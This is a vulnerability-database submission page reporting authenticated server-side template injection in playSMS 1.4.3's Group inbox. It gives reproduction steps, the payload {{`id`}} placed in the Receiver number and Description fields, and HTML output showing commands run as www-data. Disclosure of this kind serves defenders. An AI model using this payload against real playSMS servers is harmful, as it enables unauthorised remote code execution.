제출 #363733: playSMS 1.4.3 Server Side Template Injection (SSTI)정보

제목playSMS 1.4.3 Server Side Template Injection (SSTI)
설명PlaySMS 1.4.3 has authenticated Server Side Template Injection in Group inbox. The manipulation of the argument "Receiver number" and "Description", that leads to a Authenticated RCE 1. Authenticate in login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login 2. Features > Group inbox (/index.php?app=main&inc=feature_inboxgroup&op=list) 3. Click in Plus (+) icon to add new group 4. Add payload {{`id`}} in "Receiver number" and "Description field 5. Save and back to Features > Group inbox Also we can click in action edit to view Description RCE <tr><td class=label-sizer>Receiver number</td><td>uid=33(www-data) gid=33(www-data) groups=33(www-data) </td></tr> <tr><td>Keywords</td><td><input type='text' name='keywords' value='' maxlength='100'><i class='glyphicon glyphicon-info-sign playsms-tooltip' data-toggle=tooltip title='Separate with comma for multiple items' rel=tooltip></i></td></tr> <tr><td>Description</td><td><input type='text' name='description' value='uid=33(www-data) gid=33(www-data) groups=33(www-data) ' maxlength='100'></td>
원천⚠️ https://github.com/playsms/playsms/tree/master/storage/application/plugin/feature/inboxgroup
사용자
 Dhimitri (UID 45045)
제출2024. 06. 25. AM 01:15 (2 연령 ago)
모더레이션2024. 07. 03. AM 07:29 (8 days later)
상태수락
VulDB 항목270278 [playSMS 1.4.3 Template index.php?app=main&inc=feature_inboxgroup&op=list Receiver Number 권한 상승]
포인트들20

Might our Artificial Intelligence support you?

Check our Alexa App!